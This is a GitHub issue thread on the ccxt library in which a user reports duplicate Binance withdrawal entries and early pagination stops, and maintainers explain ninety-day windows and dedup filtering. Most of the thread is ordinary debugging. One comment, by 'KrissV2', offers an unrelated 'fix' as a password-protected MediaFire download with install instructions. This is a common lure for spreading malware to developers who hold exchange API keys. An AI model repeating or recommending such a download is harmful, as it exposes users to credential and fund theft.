### ISSUE TITLE
Binance fetchWithdrawals sometimes give double entries

### ISSUE THREAD

**Issue by landogarner7** [ccxt/ccxt#23592]
### Operating System

Windows

### CCXT Version

C# 4.3.91

### Description

fetchWithdrawals gives some double entries in Binance. I use the same verbose logs as in my solved topic on fetchWithdrawals speed issues to show an example : 

ResponseBody:
[{"id":"66d90029909543a3aeee485400ab604a",** 10th withdrawal information here **

Dynamic pagination call 2 method fetchWithdrawals response length 1 timestamp 1686591149001
fetch Request:
binance GET https://api.binance.com/sapi/v1/capital/withdraw/history?timestamp=1724910449158&endTime=1700214619001&startTime=1692438619001&limit=1000&recvWindow=59999&signature=fbae1382c91b6e72e71edf633c4c8fcff325219ceeb622819c6091dd095424fd
RequestHeaders:
X-MBX-APIKEY, binanceAPIkey

RequestBody:

handleRestResponse:
binance GET https://api.binance.com/sapi/v1/capital/withdraw/history?timestamp=1724910449158&endTime=1700214619001&startTime=1692438619001&limit=1000&recvWindow=59999&signature=fbae1382c91b6e72e71edf633c4c8fcff325219ceeb622819c6091dd095424fd 200
ResponseHeaders:

ResponseBody:
[]

Dynamic pagination call 3 method fetchWithdrawals response length 0 timestamp 1692438619001
fetch Request:
binance GET https://api.binance.com/sapi/v1/capital/withdraw/history?timestamp=1724910539425&endTime=1700117850000&startTime=1692341850000&limit=1000&recvWindow=59999&signature=de1eb9faeebc21c07eb6870050a645522ba204fd6cff38b16982eecde290c7a9
RequestHeaders:
X-MBX-APIKEY, binanceAPIkey

RequestBody:

handleRestResponse:
binance GET https://api.binance.com/sapi/v1/capital/withdraw/history?timestamp=1724910539425&endTime=1700117850000&startTime=1692341850000&limit=1000&recvWindow=59999&signature=de1eb9faeebc21c07eb6870050a645522ba204fd6cff38b16982eecde290c7a9 200
ResponseHeaders:

ResponseBody:
[{"id":"66d90029909543a3aeee485400ab604a",** 11th withdrawal information here **

Dynamic pagination call 1 method fetchWithdrawals response length 1 timestamp 1692341850000
fetch Request:
binance GET https://api.binance.com/sapi/v1/capital/withdraw/history?timestamp=1724910629687&endTime=1700214619001&startTime=1692438619001&limit=1000&recvWindow=59999&signature=82eaa1bc94cc6513a1c95e0dbfbb64851637d11c94edc6d759f8972e40725575
RequestHeaders:
X-MBX-APIKEY, binanceAPIkey

Note the identical id in the response body of withedrawal information 10 and 11.
The result list show 2 entries with identical id, txid and timestamp (1692438619000).
In the mentioned 60+ results given from fetchWithdrawals I find 2 times a double entry, both times it's USDT (but not all of the USDT withdrawals).

### Code

```
  

```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by carlosmiei** [comment]
Hello @landogarner7,
Thanks for reporting it. Do you get the repeated entry deterministically, or seem to be random (sometimes it happens, sometimes don't)?

**Comment by landogarner7** [comment]
Yes, I receive it all the time and - as start and end are identical in all my trials - also always with the same 2 entries.
I have also played a bit with the start timstamps in the loop with something like start = start + until + 1000 but this had no effect.

**Comment by carlosmiei** [comment]
@landogarner7 Weird, I can't reproduce this issue locally, and before returning the paginated results we run a function that removes repeated elements. Is it possible to share the returned results in the json format?

**Comment by landogarner7** [comment]
Carlos, sorry for the delay, I have been abroad...

In the meantime I have come closer to the issue, please have a look : 

Dictionary<string, object> paramEx = new Dictionary<string, object>
{
    { "until", until }, {"paginate",true }, {"paginationDirection","forward" }
};
long sinceDate = 1607904000000;
long ninetyDays =7776000000;
long today= exchange.milliseconds();
long until = sinceDate+ninetyDays;
while (until < today)
{
       paramEx["until"] = until;
       result = exchange.fetchWithdrawals(null, sinceDate, null, paramEx)
       sinceDate = until;
       until += ninetyDays;
       if (until > today)
       {
             until = today;
       }
}
"until" in the first run is 1607904000000+7776000000= 1615680000000

After the first loop run the result list contains withdrawals including timestamp 1618375368000 , which is ouside the "until" parameter I passed.

Did I make any mistake in passing the parameter correctly or does Binance not respect this parameter ? In that case it seems that they accept periods of around 120 days for this request..

Thanks !

**Comment by carlosmiei** [comment]
@landogarner7 I think you're using `paginate` incorrectly. The goal of automatic pagination is not needing the outer loop. Can you try without it?

**Comment by landogarner7** [comment]
Does "no outer loop" means also no "until", just "since"  and all the rest is automatically ? 
Or do I put "today" as "until" to mark the total period between "since" and "today" to be queried ?

**Comment by carlosmiei** [comment]
@landogarner7 Yes can you try just with since? Basically we will start from since and try to go "forward". By default ccxt does up to 10 pagination calls but you can provide `paginationCalls: X` in params to customize it.

**Comment by landogarner7** [comment]
Tried this and it seems that paginationCalls is working only with values < 10, otherwise it is always 10. Is this correct ?
This means I have to put an outer loop again but with since = result[9].timestamp+1000 to arrive until today. Correct ?

**Comment by carlosmiei** [comment]
@landogarner7 Are you sure that with `paginaitonCalls` > 10 you don't reach to the "end" of the data?

**Comment by landogarner7** [comment]
Yes, I put {"paginationCalls",20} and the result is always the same as with the first run of the loop before : 10 entries in the list, timestamp of last entry is 1618375368000.
By the way, I call fetchWithdrawals with "await".

**Comment by landogarner7** [comment]
@carlosmiei Any idea ?

**Comment by carlosmiei** [comment]
@landogarner7 Having a hard time reproducing this issue because I don't have enough withdrawals...

**Comment by landogarner7** [comment]
@carlosmiei I see... Is there any "deep verbose" I can do for you ?

**Comment by carlosmiei** [comment]
@landogarner7 no we only have the regular verbose mode.

**Comment by kroitor** [comment]
Hello @landogarner7, closing this during a cleanup with the mechanics that explain both observations. On the "cap": `paginationCalls` isn't limited to 10 — the loop honors whatever you pass — but forward pagination advances using the timestamp of the last entry in each response, and binance serves withdrawal history in windows of up to ninety days. Your own verbose log shows the third window returning empty: with no last entry to advance from, pagination terminates there, which is why twenty calls produced the same result as ten. Any ninety-day gap in a sparse multi-year history stops a forward walk. For that shape of data, either use the default backward direction (it starts from now, where your data is), or walk explicit ninety-day windows with `since` and `until` yourself.

On the duplicates: adjacent windows share inclusive boundary timestamps in the raw responses, and the paginator's repeated-element filtering removes them — the entries you saw on the 4.3.91-era C# build should not survive on a current version. If they do, a fresh issue with the returned json would make it traceable. Thanks!
